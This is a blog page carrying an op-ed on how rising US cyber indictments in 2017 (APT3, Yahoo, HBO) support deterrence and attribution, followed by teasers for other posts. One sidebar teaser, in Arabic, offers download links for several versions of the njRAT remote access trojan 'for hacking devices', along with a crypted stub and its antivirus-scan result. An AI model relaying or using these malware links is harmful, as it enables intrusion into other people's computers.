What the rise of cyber indictments means for 2018



The growing implementation of indictments throughout 2017 was arguably the most impactful government action to counter cyber attacks, and yet received little attention. In November, federal prosecutors indicted an Iranian national with military links for his role in the HBO data exfiltration. A week later, indictments were issued against three members of the Chinese threat group known as APT 3, or Gothic Panda, for corporate espionage. The following day, a Canadian pled guilty to collaborating with Russian nationals in the Yahoo breach, the same FSB officers and criminals who were issued indictments earlier this year.
These are perhaps the most high profile indictments for 2017, but criminals have also been indicted or arrested recently for masterminding global botnets, including Andromeda and Kelihos. In fact, there have been as many high profile indictments in 2017 as there have been in the last few years combined, and there already are rumors that the Department of Justice may indict six Russian nationals in 2018 in connection with the 2016 DNC hack.
Unfortunately, many of the indictments don’t actually lead to criminal convictions. For instance, the indictments against the PLA members in 2014 ostensibly demarks the first, prominent use of indictments to counter cyber theft and other crimes, but have yet to result in arrests. Nevertheless, there are a number of valuable aspects of this naming and shaming strategy that point to a clearer path for the future cyber policy and crime.
First, indictments are foundational to any deterrent strategy. The increasing use of indictments may help prompt policymakers to pursue more comprehensive legislation and strategy to finally take steps toward impacting the risk calculus of state and non-state attackers. This is long overdue and necessary. As Senator Angus King has noted, “This country has no strategy or doctrine around cyber attacks.”
In addition, while not 100% guaranteed, the naming and shaming does directly impact attackers. Although these mercenaries may enjoy safe haven within their own countries, they cannot travel freely outside those borders without risk getting caught. Russian cyber criminals have been caught in the Maldives, Barcelona, and Prague (to name a few), and one of them was recently sentenced to 27 years in jail.

The arrests of attackers for breaches such as OPM, Yahoo, and HBO further illustrates that attackers no longer can act entirely without impunity. These mercenaries likely have a wealth of information about the government and military activities on whose behalf they conducted the attacks. As more indictments lead to arrests, foreign governments will likely be concerned over the intelligence that could be gained when these attackers are captured.
Importantly, the indictments also demonstrate that attribution, although difficult, is possible. By bringing the full force of investigative capabilities and data sources, the DoJ is able to attribute some of the largest breaches. This is important not only for making arrests, but also because it provides a significant signaling mechanism to nation-states.
As the line is increasingly blurred between the cyber activities of quasi-affiliated criminal groups and foreign governments, the indictments provide a means to condemn foreign nation-state activity without directly implicating the governments, which minimizes the risk of escalation and spillover into military, economic, or diplomatic retaliation. For instance, in last month’s indictments of the Chinese nationals, U.S. attorney Soo C. Song clearly specified, “It is not an element or subject of this indictment that there is state sponsorship.” This is important, since state-sponsorship would negate the 2015 U.S.-Sino cyber agreement against corporate espionage.
With the DoJ considering charges against at least six Russian nationals for the DNC breach, the rule of law is proving a valuable tool to finally counter widespread cybercrime and espionage. While indictments alone are not sufficient to fill the current vacuum in U.S. strategy when it comes to countering cyber attacks, they provide the necessary foundation for a U.S. legal response that results in real-world consequences for the attackers. As indictments increasingly play an integral component in the U.S. response to cybercrime and espionage throughout 2018, it will be necessary to see if and how they change the risk calculus of both nation-state and non-state attackers

Dr. Andrea Little Limbago, Chief Social Scientist at Endgame

Comments

Post a Comment

Popular posts from this blog

تحميل اصدارات برنامج njRAT لاختراق الاجهزة 2017

Image
تحميل   اصدارات برنامج  njRAT  لاختراق الاجهزة  2017 ---------------------------------------------------------------------------------------------- السلام عليكم ورحمة الله تعالى وبركاته تحميل جميع اصدارات برنامج  njRAT  الشهير لاختراق الاجهزة مع تشفيرة متواضعة  لستب njRAT 5 نتيجة فحص تشفيرة الستب http://pscan.xyz/results.php?id=VbGXRoAJjWiEeSHH الان ناتي الى التحميل njRAT_v0.3.5 للتحميل https://up.top4top.net/downloadf-483nr2oz4-rar.html njRAT_v0.4.1 https://up.top4top.net/downloadf-483nhv6j2-rar.html njRAT_v0.5.0 للتحميل https://up.top4top.net/downloadf-483nihol1-rar.html njRAT-v0.6.4 للتحميل https://up.top4top.net/downloadf-483dr2zk1-rar.html njRAT-v0.7d
Read more

Cybersecurity in 2018: Three predictions and one hope

Image
Effective cybersecurity means keeping a close eye on the threats you currently face, and an even closer eye on the threats to come. As you consider your security strategy and investments for the coming year, here are three key trends that will define the threat landscape in 2018, and one hope for a more effective approach to protection.  Risk will continue to shift from infrastructure to the application layer As web apps have evolved from basic information and ecommerce functionality to full-fledged online services, their code and customer data have made them an increasingly appealing target for hackers. Not only are they accessible via the open Internet—they’re also woefully underprotected, with the application layer drawing only 3 percent of the typical security budget at a time when it accounts for 30 percent of successful breaches, according to Verizon. While an incident of the magnitude of the Equifax breach can hardly be said to have a silver lining, at
Read more

Which phishing messages have a near 100% click rate?

Image
Training employees to spot phishing emails, messages and phone calls can’t be done just once or once a year if the organization wants to see click rates decrease. For one thing, employees come and go (and change roles) with regularity. Secondly, threats change over time. Thirdly, knowledge and practices that aren’t regularly reinforced will be lost. And, finally, awareness isn’t the same as knowledge. “Just knowing a threat exists isn’t the same as knowing how to recognize and respond to a threat when it presents itself. In-depth education about phishing prevention is needed to create lasting behavior change,” Wombat Security researchers point out. The statistics included in the company’s latest annual State of the Phish report show the difference made by both the tools used to train end users to recognize and avoid phishing attacks and how often they are used. In the US, most organizations use computer-based online security awareness training and simulated
Read more